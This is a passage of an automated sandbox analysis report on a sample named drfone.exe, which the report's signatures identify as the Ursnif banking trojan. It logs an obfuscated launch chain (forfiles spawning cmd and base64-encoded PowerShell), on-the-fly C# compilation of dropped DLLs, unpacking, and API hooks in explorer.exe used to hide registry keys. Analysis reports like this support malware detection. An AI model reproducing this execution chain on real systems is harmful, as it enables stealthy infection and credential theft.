Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe /k 'C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe' -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE3A5.tmp' 'c:\Users\user\AppData\Local\Temp\xqhvpwja\CSC8240488428EC4188955E47238990560.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF2B8.tmp' 'c:\Users\user\AppData\Local\Temp\r1g0ykja\CSC64F5131A8743441E92CD84029AD3C82.TMP'
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17416 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82952 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82954 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17426 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82958 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17430 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82962 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17434 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\forfiles.exe forfiles /c 'cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit' /p C:\Windows\system32 /s /m po*l.e*e
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\cmd.exe /k 'C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe' -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE3A5.tmp' 'c:\Users\user\AppData\Local\Temp\xqhvpwja\CSC8240488428EC4188955E47238990560.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF2B8.tmp' 'c:\Users\user\AppData\Local\Temp\r1g0ykja\CSC64F5131A8743441E92CD84029AD3C82.TMP'
Source: C:\Users\user\Desktop\drfone.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: drfone.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.458052890.000002253C6E0000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.469189795.0000020232DA0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000027.00000000.496074422.00000000075A0000.00000002.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.pdbXP8a source: powershell.exe, 00000020.00000002.511653294.00000276C6894000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.pdb source: powershell.exe, 00000020.00000002.511653294.00000276C6894000.00000004.00000001.sdmp
Source: Binary string: Make Time=%d, Break Time=%dCSpkp::Init - Aec init failed cs-uri-query-- %d -- %d-- %d -- %d (timeout %d sec)There is not enough space for the configuration database on the diskm_SquareRootVariance = %f (Mse=%f,PowerLimit=%f[dBm])EV_MMAC_RESET_COMPLETEAmos/DataPumpsIN Power Limits !da_join failed, thread %lu: %sC:\Program Files\new_project\src\project.pdbVirtualAllockernel32expecting numeric value.kernel32RJPNULL@ source: drfone.exe
Source: Binary string: :C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.pdb source: powershell.exe, 00000020.00000002.511653294.00000276C6894000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.pdbXP8a source: powershell.exe, 00000020.00000002.511729573.00000276C6900000.00000004.00000001.sdmp
Source: Binary string: C:\Program Files\new_project\src\project.pdb source: drfone.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000027.00000000.496074422.00000000075A0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\drfone.exe Unpacked PE file: 0.2.drfone.exe.400000.0.unpack .text:ER;.data:W;.idata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\drfone.exe Unpacked PE file: 0.2.drfone.exe.400000.0.unpack
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.cmdline'
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_037819E5 pushfd ; iretd 0_3_03781A08
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_037819E5 pushfd ; iretd 0_3_03781A08
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_037819E5 pushfd ; iretd 0_3_03781A08
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_03781987 push edi; retf 0_3_03781988
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_03781987 push edi; retf 0_3_03781988
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_03781987 push edi; retf 0_3_03781988
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_037819E5 pushfd ; iretd 0_3_03781A08
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_037819E5 pushfd ; iretd 0_3_03781A08
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_037819E5 pushfd ; iretd 0_3_03781A08
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_03781987 push edi; retf 0_3_03781988
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_03781987 push edi; retf 0_3_03781988
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_03781987 push edi; retf 0_3_03781988
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_037819E5 pushfd ; iretd 0_3_03781A08
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_037819E5 pushfd ; iretd 0_3_03781A08
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_037819E5 pushfd ; iretd 0_3_03781A08
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_03781987 push edi; retf 0_3_03781988
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_03781987 push edi; retf 0_3_03781988
Source: C:\Users\user\Desktop\drfone.exe Code function: 0_3_03781987 push edi; retf 0_3_03781988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD02C13AC8 push esp; retf 4810h 32_2_00007FFD02C13BB5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD02CD08AB push edx; retf 32_2_00007FFD02CD08AC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD02CD0896 push ss; ret 32_2_00007FFD02CD0897

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.348748393.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430319768.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349342802.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348465665.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349241106.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348544234.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349447113.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349510962.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349495954.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348922196.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430336469.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348235899.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348681532.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349069504.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.504554057.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349393384.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348075019.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349414993.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430159099.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349162984.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396402042.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349022364.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348869581.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349465567.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389630441.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.416634770.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348813448.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.383185635.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349203884.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430074688.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348389706.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348613375.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348156130.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347990018.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349275689.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348315452.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.429874583.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347903589.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349306914.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349115327.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.403082199.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349368664.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348972194.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: drfone.exe PID: 7072, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: ntdll.dll function: NtCreateUserProcess address: 7FFD88ECF200
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW address: AA8388
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: ntdll.dll function: NtCreateUserProcess new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\drfone.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
